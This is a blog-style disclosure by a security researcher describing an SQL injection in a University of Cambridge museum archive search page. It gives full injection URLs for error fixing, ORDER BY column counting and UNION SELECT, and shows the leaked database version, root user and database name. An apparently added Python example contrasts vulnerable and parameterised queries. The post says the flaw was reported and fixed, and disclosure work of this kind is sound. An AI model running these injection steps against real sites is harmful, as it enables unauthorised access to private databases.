SQL Injection Vulnerability In University Of Cambridge
Hello
Introduction Of Author:
I am Adesh Nandkishor Kolte, an independent security researcher from India.
Found a SQL Injection Vulnerability in University Of Cambridge
This is the most prevalent and most dangerous of web application vulnerabilities. With an SQLi vulnerability in the application, an attacker may cause severe damage, such as bypassing logins, retrieving sensitive information, and modifying or deleting data. Sometimes this costs lives when it comes to the healthcare and banking domains. Okay, introduction apart, the objective of this article is to exploit and read some sensitive data from the database. If you don't know what exactly SQLi is, then read my other article, which may throw some light on it. I am splitting the subject into two parts; having everything in one might make you lose interest.
Identifying the vulnerable site!
I tried the most basic check for SQL vulnerability by inserting an apostrophe (') in the username field, leaving the password field empty and trying to log in. After a few attempts, this website gave me an SQL error which looked something like this.
Now, let's get started. Launch your target and select SQL injection GET/Search.
Our target URL:
Fixing The Error
So I tried some tricks for fixing this error, which occurred when I entered the single quote (').
Like that:
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum' --+
(Worked :) Fixed the error.)
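The apostrophe error above is what string-built SQL looks like from the outside. The following is an added example, not the site's code (which the post does not show): it reproduces the error and the fix in Python, with sqlite3 standing in for MySQL. The table layout, the allow-list and the assumption that opt[] carries a column name are hypothetical.

```python
import sqlite3

# Hypothetical allow-list of searchable columns (names assumed for illustration).
ALLOWED_COLUMNS = {"named_individuals_sum", "title_sum"}

def make_db():
    # Constructed sample data; sqlite3 stands in for the site's MySQL server.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE archive (id INTEGER, named_individuals_sum TEXT, title_sum TEXT)")
    db.executemany("INSERT INTO archive VALUES (?, ?, ?)",
                   [(1, "Boutin, A.", "Letter book"), (2, "Winsor, W.", "Recipe book")])
    return db

def search_vulnerable(db, column, term):
    # Request values are pasted straight into the SQL text, so a stray
    # apostrophe in either one changes the structure of the statement.
    sql = f"SELECT id FROM archive WHERE {column} LIKE '%{term}%'"
    return [r[0] for r in db.execute(sql)]

def search_hardened(db, column, term):
    # Identifiers cannot be bound as parameters, so the column name is
    # checked against a fixed allow-list before it reaches the SQL text.
    if column not in ALLOWED_COLUMNS:
        raise ValueError("unknown search field")
    # The search term travels as a bound parameter and is never parsed as SQL.
    sql = f"SELECT id FROM archive WHERE {column} LIKE ?"
    return [r[0] for r in db.execute(sql, (f"%{term}%",))]

def probe(search, column, term):
    """Return 'ok', 'sql-error' or 'rejected' for one request."""
    db = make_db()
    try:
        search(db, column, term)
        return "ok"
    except sqlite3.OperationalError:
        return "sql-error"   # the database parsed request text as SQL
    except ValueError:
        return "rejected"    # stopped by validation before any query ran

if __name__ == "__main__":
    requests = [("named_individuals_sum", "Boutin"),
                ("named_individuals_sum", "O'Brien"),
                ("named_individuals_sum'", "Boutin")]
    for column, term in requests:
        print(repr(column), repr(term),
              probe(search_vulnerable, column, term),
              probe(search_hardened, column, term))
```

A legitimate surname containing an apostrophe breaks the string-built query just as the probe does, which is why the hardened version binds the term instead of trying to filter quotes.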
Finding Columns Using Order By or Group By
Order By Clause in MySQL
The SQL ORDER BY clause is used to sort the data in ascending or descending order, based on one or more columns. Some databases sort the query results in an ascending order by default.
Group By Clause in MySQL
The SQL GROUP BY clause is used in collaboration with the SELECT statement to arrange identical data into groups. This GROUP BY clause follows the WHERE clause in a SELECT statement and precedes the ORDER BY clause.
For finding the columns here, I used the ORDER BY clause:
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum' order by 16 --+
So I tried order by 15 --+ here:
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum' order by 15 --+
The site loaded normally, so this website has 15 columns.
Finding Vulnerable Column From 15 Columns
For finding the vulnerable column, I have to use this keyword in MySQL:
UNION SELECT
What is the use of the UNION clause in MySQL?
The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows.
What is the SELECT statement?
The SQL SELECT statement is used to fetch the data from a database table which returns this data in the form of a result table. These result tables are called result-sets.
Syntax
The basic syntax of the UNION SELECT statement is as follows:
UNION SELECT column1, column2, columnN FROM table_name;
Getting Required Data
For finding the version, user and database name, SQL provides functions,
for example version(), user() and database().
Version()
Output:
5.1.39-community
User()
Output:
root@koala.fitzmuseum.cam.ac.uk
Database()
Output:
wn_index
I reported it last week and the vulnerability was fixed :)
I hope you like the article.
Thanks for Reading and Happy Hunting :)